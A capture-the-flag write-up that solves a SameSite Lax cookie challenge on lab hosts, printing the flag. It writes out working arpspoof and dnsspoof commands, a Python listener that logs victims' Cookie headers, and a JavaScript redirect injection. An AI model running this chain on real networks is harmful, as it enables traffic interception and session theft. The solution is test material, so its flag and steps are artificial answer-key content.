Token 7: SameSite Lax Cookie
Token: PCCC{C00k13_B4nd1t_09_13qv}
Objective
Steal the tokenLax cookie from webvictim.pccc. The cookie belongs to domain external.target.pccc on port 80 and is marked SameSite: Lax.
Hosts
- webvictim.pccc: 10.0.91.136
- web.pccc: 10.0.91.135
- Cookie domain: external.target.pccc
Understanding SameSite: Lax
- Lax cookies are sent with top-level navigations (clicking links, GET requests)
- NOT sent with cross-site POST, iframes, or AJAX from different origins
- To steal: trigger a top-level navigation to external.target.pccc that you control
Method: DNS Spoof + Cookie Capture
Step 1: ARP spoof victim ↔ DNS server
arpspoof -i eth1 -t 10.0.91.136 10.0.91.133 &
arpspoof -i eth1 -t 10.0.91.133 10.0.91.136 &
Step 2: Spoof DNS for external.target.pccc
Respond to DNS queries for external.target.pccc with your IP:
echo "10.0.91.138 external.target.pccc" > /tmp/dns.txt
dnsspoof -i eth1 -f /tmp/dns.txt
Step 3: Set up fake server on port 80
nc -nlvp 80
Or a simple Python HTTP server that logs cookies:
from http.server import HTTPServer, BaseHTTPRequestHandler
class Handler(BaseHTTPRequestHandler):
def do_GET(self):
print("Cookie:", self.headers.get('Cookie'))
self.send_response(200)
self.end_headers()
HTTPServer(('0.0.0.0', 80), Handler).serve_forever()
Step 4: Trigger navigation to external.target.pccc
Inject JavaScript into web.pccc response to redirect:
window.location = 'http://external.target.pccc/';
Or inject an image/link that causes navigation.
Step 5: Capture the cookie
When the victim’s browser navigates to external.target.pccc (which resolves to your IP), it sends the Lax cookie with the request:
Cookie: tokenLax=PCCC{C00k13_B4nd1t_09_13qv}
Why It Works
SameSite: Lax allows cookies on top-level navigations. By:
- Spoofing DNS to redirect external.target.pccc to your IP
- Triggering a navigation to that domain
- The browser sends the Lax cookie, which you capture
Cleanup
pkill arpspoof
pkill dnsspoof